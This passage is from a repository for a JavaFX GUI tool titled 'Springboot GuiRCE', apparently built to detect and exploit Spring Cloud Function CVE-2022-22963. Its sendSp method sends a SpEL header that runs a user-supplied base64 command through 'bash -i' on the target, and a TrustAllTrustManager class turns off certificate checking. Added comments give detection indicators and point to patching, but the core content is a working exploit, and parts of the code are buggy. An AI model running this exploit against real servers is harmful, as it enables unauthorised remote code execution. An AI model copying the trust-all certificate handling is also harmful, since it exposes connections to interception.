        while ((inputLine = br.readLine()) != null) {
        }
        response.append(inputLine);

        // inputLine is null once the loop above ends, so this call throws and control goes to the catch block.
        if (inputLine.contains("functionRouter")){
            responsetest.appendText("【+】可能存在Spring Cloud Function SpEL RCE (CVE-2022-22963)漏洞" + "\n");

        } else if(responseCode==404||responseCode==401 || responseCode==403 ){

            responsetest.appendText("不存在Spring Cloud Function SpEL RCE (CVE-2022-22963)漏洞" + "\n");
        }


    } catch (Exception e) {

        // Every failure is reported as a network error.
        responsetest.appendText("网络异常" + "\n");
    }

}
910 |
911 |
/**
 * Probes {@code <target>/actuator} with a GET and prints the status code to stdout.
 *
 * <p>On HTTP 200 the response stream is opened but its content is not read or shown;
 * no verdict is written to the UI for any status. Failures are printed to stderr. The
 * target URL is used as typed, without trimming a trailing slash.
 *
 * <p>Defender notes: an actuator index that answers unauthenticated requests from
 * untrusted networks is the exposure this probe looks for; restricting or
 * authenticating the actuator endpoints removes it.
 */
public void sendGetRequest() {
    final String base = urlTest.getText();
    try {
        HttpURLConnection conn = (HttpURLConnection) new URL(base + "/actuator").openConnection();
        conn.setRequestMethod("GET");

        final int status = conn.getResponseCode();
        System.out.println("Response Code : " + status);

        if (status == HttpURLConnection.HTTP_OK) {
            // The stream is opened and wrapped, but nothing is read from it.
            BufferedReader reader = new BufferedReader(new InputStreamReader(conn.getInputStream()));
            StringBuffer body = new StringBuffer();
        }
    } catch (Exception e) {
        e.printStackTrace();
    }
}
976 |
/**
 * Sends the CVE-2022-22963 request to {@code <target>/functionRouter}.
 *
 * <p>What goes on the wire: a {@code POST} with {@code Content-Type: text/plain}, the body
 * {@code test}, and a {@code spring.cloud.function.routing-expression} request header that
 * carries a SpEL expression. The text of {@code urltest1} is concatenated into that header
 * without any validation. The target comes from {@code urlTest}, with one trailing slash
 * removed.
 *
 * <p>For defenders: the header name on a POST to {@code /functionRouter} is the stable
 * indicator to match in proxy, WAF and access logs. The remedy is upgrading Spring Cloud
 * Function to a release that fixes CVE-2022-22963.
 *
 * <p>Review notes:
 * <ul>
 *   <li>The two {@code System.setProperty} calls change the proxy for the whole JVM, not
 *       just this request, and they are never reset.</li>
 *   <li>The status text written to {@code responsetest2} is not evidence of what the
 *       server did: the first response line is compared to a literal with {@code ==}
 *       (a reference comparison), so that text does not reflect the response content.</li>
 *   <li>{@code button} and {@code response} are created and never used; {@code os} and
 *       {@code br} are never closed.</li>
 * </ul>
 */
public void sendSp(){

    try{
        Button button=new Button();

        // Process-wide proxy settings: every later HTTP connection from this JVM is
        // routed through 127.0.0.1:8098 as well.
        System.setProperty("http.proxyHost", "127.0.0.1");
        System.setProperty("http.proxyPort", "8098");
        String url =urlTest.getText();
        if (url.endsWith("/")) {
            url = url.substring(0, url.length() - 1); // drop the last character (the slash)
        }
        URL url1 = new URL(url + "/functionRouter");
        String json = "test";

        HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
        connection.setDoOutput(true);
        connection.setRequestMethod("POST");
        connection.setRequestProperty("Content-Type", "text/plain");

        // The expression travels in this header, not in the body. The header name is what
        // request logging and filtering rules can key on.
        connection.setRequestProperty("spring.cloud.function.routing-expression", "T(java.lang.Runtime).getRuntime().exec(\"bash -c {echo,"+urltest1.getText()+"}|{base64,-d}|{bash,-i}\")");
        byte[] input=json.getBytes(StandardCharsets.UTF_8);
        OutputStream os = connection.getOutputStream();

        os.write(input,0,input.length);
        // getInputStream() is what actually completes the request; it throws for an HTTP
        // error status, which lands in the catch block below.
        BufferedReader br = new BufferedReader(new InputStreamReader(connection.getInputStream()));
        StringBuffer response = new StringBuffer();
        String inputLine;
        // Reference comparison against a literal, not String.equals().
        if ((inputLine = br.readLine()) == "test") {

            responsetest2.appendText("连接完成"+"\n");

        }
        else{

            responsetest2.appendText("连接失败"+"\n");

        }

    }
    catch (Exception e){

        // Every failure (bad URL, proxy not listening, HTTP error status) ends up here
        // and is reported with the same message.
        responsetest2.appendText("连接失败,网络异常!"+"\n"+"\n");

    }
}
1050 |
1051 |
1052 |
1053 |
1054 |
1055 |
1056 |
1057 |
/**
 * FXML action handler: runs {@code sendGetRequest1()} and prints the stack trace of
 * anything it throws instead of letting it propagate.
 *
 * @param event the action event that triggered the handler (not used)
 */
@FXML
void Clickevent1(ActionEvent event) {
    try {
        sendGetRequest1();
    } catch (Exception failure) {
        // Best effort: report on stderr and keep the UI alive.
        failure.printStackTrace();
    }
}
1078 |
1079 |
1080 |
1081 |
/**
 * FXML action handler: turns on line wrapping for the {@code responsetest} output area,
 * then runs {@code sendGetRequest1()}.
 *
 * <p>The call is made directly on the thread that delivers the event.
 *
 * @param event the action event that triggered the handler (not used)
 */
@FXML
void Clickevent(ActionEvent event) {
    responsetest.setWrapText(true);
    sendGetRequest1();
}
1127 |
1128 |
// Empty placeholder type: it declares no fields, constructors or methods.
private class ResponseHeader {
}
1131 | }
1132 |
1133 |
1134 |
1135 |
1136 |
1137 |
1138 |
1139 |
1140 |
1141 |
1142 |
1143 |
1144 |
1145 |
1146 |
1147 |
1148 |
1149 | // if (a.getText().trim().isEmpty()) {
1150 | // System.out.println("null");
1151 | // Alert alert = new Alert(Alert.AlertType.INFORMATION);
1152 | // alert.setHeaderText(null);
1153 | // alert.setContentText("ok");
1154 | // alert.showAndWait();
1155 | // b.setEditable(false);
1156 |
1157 |
1158 | // if (a.getText().trim().()) {
1159 | // System.out.println("nullok");
1160 |
1161 |
1162 |
1163 |
1164 |
1165 |
1166 |
1167 |
1168 |
1169 |
1170 |
--------------------------------------------------------------------------------
/main/java/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: Main
3 |
4 |
--------------------------------------------------------------------------------
/main/java/Main.java:
--------------------------------------------------------------------------------
1 | import javafx.application.Application;
2 | import javafx.collections.FXCollections;
3 | import javafx.collections.ObservableList;
4 | import javafx.fxml.FXMLLoader;
5 | import javafx.scene.Parent;
6 | import javafx.scene.Scene;
7 | import javafx.scene.control.ComboBox;
8 | import javafx.scene.layout.Pane;
9 | import javafx.scene.layout.VBox;
10 | import javafx.stage.Stage;
11 |
12 | import java.util.Objects;
13 |
14 |
15 |
/**
 * JavaFX entry point: loads the {@code ff.fxml} layout and shows it in a fixed-size window.
 */
public class Main extends Application {

    /**
     * Builds the primary window.
     *
     * @param primaryStage the stage handed over by the JavaFX runtime
     * @throws Exception if {@code ff.fxml} is missing from the class path
     *         ({@link NullPointerException}) or cannot be loaded
     */
    @Override
    public void start(Stage primaryStage) throws Exception {
        // Fail fast with an NPE when the layout resource is not on the class path.
        java.net.URL layout =
                Objects.requireNonNull(getClass().getClassLoader().getResource("ff.fxml"));
        Parent root = FXMLLoader.load(layout);
        Scene scene = new Scene(root, 1280, 800);

        primaryStage.setTitle("Springboot GuiRCE by:bad Man");
        primaryStage.setScene(scene);
        primaryStage.show();

        // Lock the window to its initial size.
        primaryStage.setMaximized(false);
        primaryStage.setResizable(false);

        primaryStage.show();
    }

    /**
     * Hands control to the JavaFX launcher.
     *
     * @param args command-line arguments, passed through unchanged
     */
    public static void main(String[] args) {
        launch(args);
    }
}
100 |
101 |
102 |
--------------------------------------------------------------------------------
/main/java/TrustAllTrustManager.java:
--------------------------------------------------------------------------------
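/**
 * {@link javax.net.ssl.X509TrustManager} that accepts every certificate chain.
 *
 * <p>Both check methods return without inspecting their arguments, so a TLS context built
 * on this manager performs no validation of the peer's certificate at all. Expired,
 * self-signed and attacker-issued chains all pass. Any connection that uses it can be
 * intercepted by a party on the network path, together with everything sent over it.
 * Keep it out of code that handles credentials or other sensitive data. Where a private
 * CA is the reason for using it, load that CA into a dedicated trust store instead.
 */
public class TrustAllTrustManager implements javax.net.ssl.TrustManager, javax.net.ssl.X509TrustManager {

    /**
     * Returns an empty issuer list.
     *
     * <p>The {@code X509TrustManager} contract requires a non-null (possibly empty) array.
     * The previous {@code null} return can cause a {@link NullPointerException} in callers
     * that iterate the result.
     *
     * @return a new zero-length array, never {@code null}
     */
    @Override
    public java.security.cert.X509Certificate[] getAcceptedIssuers() {
        return new java.security.cert.X509Certificate[0];
    }

    /**
     * Accepts any server chain: never throws, never looks at {@code certs}.
     *
     * @param certs the chain presented by the server (ignored)
     * @param authType the key-exchange algorithm (ignored)
     * @throws java.security.cert.CertificateException declared by the interface, never thrown here
     */
    @Override
    public void checkServerTrusted(java.security.cert.X509Certificate[] certs, String authType)
            throws java.security.cert.CertificateException {
        // Deliberately empty: no validation is performed.
    }

    /**
     * Accepts any client chain: never throws, never looks at {@code certs}.
     *
     * @param certs the chain presented by the client (ignored)
     * @param authType the authentication type (ignored)
     * @throws java.security.cert.CertificateException declared by the interface, never thrown here
     */
    @Override
    public void checkClientTrusted(java.security.cert.X509Certificate[] certs, String authType)
            throws java.security.cert.CertificateException {
        // Deliberately empty: no validation is performed.
    }

}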
--------------------------------------------------------------------------------
/main/java/ff.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/main/java/main.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/main/java/out/production/main/Ff$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MInggongK/SpringbootGuiExploit/0788c3987e3b5024007ecdf53311058afaa8c92a/main/java/out/production/main/Ff$1.class
--------------------------------------------------------------------------------
/main/java/out/production/main/Ff.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MInggongK/SpringbootGuiExploit/0788c3987e3b5024007ecdf53311058afaa8c92a/main/java/out/production/main/Ff.class
--------------------------------------------------------------------------------
/main/java/out/production/main/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: Main
3 |
4 |
--------------------------------------------------------------------------------
/main/java/out/production/main/Main.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MInggongK/SpringbootGuiExploit/0788c3987e3b5024007ecdf53311058afaa8c92a/main/java/out/production/main/Main.class
--------------------------------------------------------------------------------
/main/java/out/production/main/TrustAllTrustManager.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MInggongK/SpringbootGuiExploit/0788c3987e3b5024007ecdf53311058afaa8c92a/main/java/out/production/main/TrustAllTrustManager.class
--------------------------------------------------------------------------------
/main/java/out/production/main/ff.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/main/java/out/production/main/main.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/out/artifacts/ceshi_jar/ceshi.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MInggongK/SpringbootGuiExploit/0788c3987e3b5024007ecdf53311058afaa8c92a/out/artifacts/ceshi_jar/ceshi.jar
--------------------------------------------------------------------------------
/out/production/ceshi/Ff$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MInggongK/SpringbootGuiExploit/0788c3987e3b5024007ecdf53311058afaa8c92a/out/production/ceshi/Ff$1.class
--------------------------------------------------------------------------------
/out/production/ceshi/Ff$2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MInggongK/SpringbootGuiExploit/0788c3987e3b5024007ecdf53311058afaa8c92a/out/production/ceshi/Ff$2.class
--------------------------------------------------------------------------------
/out/production/ceshi/Ff$ResponseHeader.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MInggongK/SpringbootGuiExploit/0788c3987e3b5024007ecdf53311058afaa8c92a/out/production/ceshi/Ff$ResponseHeader.class
--------------------------------------------------------------------------------
/out/production/ceshi/Ff.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MInggongK/SpringbootGuiExploit/0788c3987e3b5024007ecdf53311058afaa8c92a/out/production/ceshi/Ff.class
--------------------------------------------------------------------------------
/out/production/ceshi/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: Main
3 |
4 |
--------------------------------------------------------------------------------
/out/production/ceshi/Main.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MInggongK/SpringbootGuiExploit/0788c3987e3b5024007ecdf53311058afaa8c92a/out/production/ceshi/Main.class
--------------------------------------------------------------------------------
/out/production/ceshi/TrustAllTrustManager.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MInggongK/SpringbootGuiExploit/0788c3987e3b5024007ecdf53311058afaa8c92a/out/production/ceshi/TrustAllTrustManager.class
--------------------------------------------------------------------------------
/out/production/ceshi/ff.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/out/production/ceshi/main.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/out/production/ceshi/out/production/main/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: Main
3 |
4 |
--------------------------------------------------------------------------------
/out/production/ceshi/out/production/main/ff.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/out/production/ceshi/out/production/main/main.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------